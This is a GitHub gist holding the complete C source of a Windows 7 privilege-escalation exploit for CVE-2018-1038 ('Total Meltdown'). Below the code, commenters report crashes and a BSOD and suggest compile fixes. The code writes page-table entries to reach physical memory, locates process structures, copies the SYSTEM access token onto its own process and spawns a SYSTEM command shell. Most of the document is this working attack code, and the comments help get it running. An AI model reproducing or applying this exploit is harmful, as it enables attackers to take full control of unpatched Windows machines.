Skip to content

Instantly share code, notes, and snippets.

@xpn xpn/CVE-2018-1038.c Secret
Last active Jan 10, 2019

Embed
What would you like to do?
#include "stdafx.h"
#define PML4_BASE 0xFFFFF6FB7DBED000
#define PDP_BASE 0xFFFFF6FB7DA00000
#define PD_BASE 0xFFFFF6FB40000000
#define PT_BASE 0xFFFFF68000000000
int main()
{
printf("TotalMeltdown PrivEsc exploit by @_xpn_\n");
printf(" paging code by @UlfFrisk\n\n");
printf(" https://blog.xpnsec.com/total-meltdown-cve-2018-1038\n\n");
unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD;
DWORD done;
// Check for vulnerability
__try {
int test = *(unsigned long long *)PML4_BASE;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
printf("[X] Could not access PML4 address, system likely not vulnerable\n");
return 2;
}
// setup: PDPT @ fixed hi-jacked physical address: 0x10000
// This code uses the PML4 Self-Reference technique discussed, and iterates until we find a "free" PML4 entry
// we can hijack.
for (iPML4 = 256; iPML4 < 512; iPML4++) {
vaPML4e = PML4_BASE + (iPML4 << 3);
if (*(unsigned long long *)vaPML4e) { continue; }
// When we find an entry, we add a pointer to the next table (PDPT), which will be
// stored at the physical address 0x10000
*(unsigned long long *)vaPML4e = 0x10067;
break;
}
printf("[*] PML4 Entry Added At Index: %d\n", iPML4);
// Here, the PDPT table is referenced via a virtual address.
// For example, if we added our hijacked PML4 entry at index 256, this virtual address
// would be 0xFFFFF6FB7DA00000 + 0x100000
// This allows us to reference the physical address 0x10000 as:
// PML4 Index: 1ed | PDPT Index : 1ed | PDE Index : 1ed | PT Index : 100
vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3));
printf("[*] PDPT Virtual Address: %p", vaPDPT);
// 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages
// Below is responsible for adding 31 entries to the PDPT
for (iPDPT = 0; iPDPT < 31; iPDPT++) {
*(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12);
}
// For each of the PDs, a further 512 PT's are created. This gives access to
// 512 * 32 * 2mb = 33gb physical memory space
for (iPDPT = 0; iPDPT < 31; iPDPT++) {
if ((iPDPT % 3) == 0)
printf("\n[*] PD Virtual Addresses: ");
vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3));
printf("%p ", vaPD);
for (iPD = 0; iPD < 512; iPD++) {
// Below, notice the 0xe7 flags added to each entry.
// This is used to create a 2mb page rather than the standard 4096 byte page.
*(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7;
}
}
printf("\n[*] Page tables created, we now have access to ~31gb of physical memory\n");
#define EPROCESS_IMAGENAME_OFFSET 0x2e0
#define EPROCESS_TOKEN_OFFSET 0x208
#define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base
unsigned long long ourEPROCESS = 0, systemEPROCESS = 0;
unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3));
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
printf("[*] Hunting for _EPROCESS structures in memory\n");
for (unsigned long long i = 0x100000; i < 31 * 512 * 2097152; i++) {
__try {
// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field
if (ourEPROCESS == 0 && memcmp("TotalMeltdownP", (unsigned char *)(exploitVM + i), 14) == 0) {
if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
printf("[*] Found our _EPROCESS at %p\n", ourEPROCESS);
}
}
// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field
else if (systemEPROCESS == 0 && memcmp("System\0\0\0\0\0\0\0\0\0", (unsigned char *)(exploitVM + i), 14) == 0) {
if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {
systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;
printf("[*] Found System _EPROCESS at %p\n", systemEPROCESS);
}
}
if (systemEPROCESS != 0 && ourEPROCESS != 0) {
// Swap the tokens by copying the pointer to System Token field over our process token
printf("[*] Copying access token from %p to %p\n", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET);
*(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET);
printf("[*] Done, spawning SYSTEM shell...\n\n");
CreateProcessA(0,
"cmd.exe",
NULL,
NULL,
TRUE,
0,
NULL,
"C:\\windows\\system32",
&si,
&pi);
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
printf("[X] Exception occured, stopping to avoid BSOD\n");
return 2;
}
}
return 0;
}
@MEM-TEK

This comment has been minimized.

Copy link

commented Apr 23, 2018

Wow. That is pretty straightforward and simple code. It is interesting that the code swaps tokens only after memory has been located which is to be viewed.

@awify

This comment has been minimized.

Copy link

commented Apr 23, 2018

I compiled with vs2012,it must be something wrong the code.

Problem signature:
Problem Event Name: APPCRASH
Application Name: cve-2018-1038.exe
Application Version: 0.0.0.0
Application Timestamp: 5ade000c
Fault Module Name: cve-2018-1038.exe
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 5ade000c
Exception Code: c0000005
Exception Offset: 00001089
OS Version: 6.1.7601.2.1.0.256.48
Locale ID: 1033
Additional Information 1: 0a9e
Additional Information 2: 0a9e372d3b4ad19135b953a78882e789
Additional Information 3: 0a9e
Additional Information 4: 0a9e372d3b4ad19135b953a78882e789

@awify

This comment has been minimized.

Copy link

commented Apr 23, 2018

	vaPML4e	18446734156630065160	unsigned __int64
@scottcate

This comment has been minimized.

Copy link

commented Apr 23, 2018

@fuglede

This comment has been minimized.

Copy link

commented Apr 25, 2018

Those having compilation issues may want to #include <windows.h>.

Trying this out on a vulnerable 2008 R2 caused a BSOD.

@RaphaelVAnderson

This comment has been minimized.

Copy link

commented Apr 26, 2018

As awify says When I compiled the code with VS2008 and VS2015 and test it on win-8-x64 I got the same result.
How can i fix it?

Problem signature:
Problem Event Name: APPCRASH
Application Name: TotalMeltdown.exe
Application Version: 0.0.0.0
Application Timestamp: 5ae00ae7
Fault Module Name: TotalMeltdown.exe
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 5ae00ae7
Exception Code: c0000005
Exception Offset: 0000107e
OS Version: 6.1.7601.2.1.0.256.1
Locale ID: 1033
Additional Information 1: 0a9e
Additional Information 2: 0a9e372d3b4ad19135b953a78882e789
Additional Information 3: 0a9e
Additional Information 4: 0a9e372d3b4ad19135b953a78882e789

@thatskriptkid

This comment has been minimized.

Copy link

commented May 2, 2018

@RaphaelVAnderson exploit affects only Windows 7

@AllKittyy

This comment has been minimized.

Copy link

commented May 9, 2018

#include "stdafx.h"
Error: No such file or directory: stdafx.h

Can I just remove this line? If not, what do I need to replace it with? Or can I just download stdafx.h from somewhere?

@betrayerx

This comment has been minimized.

Copy link

commented Nov 7, 2018

AllKittyy

  1. try <stdafx.h>
  2. or delete this include, and write include <windows.h> , <stdio.h> and others
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.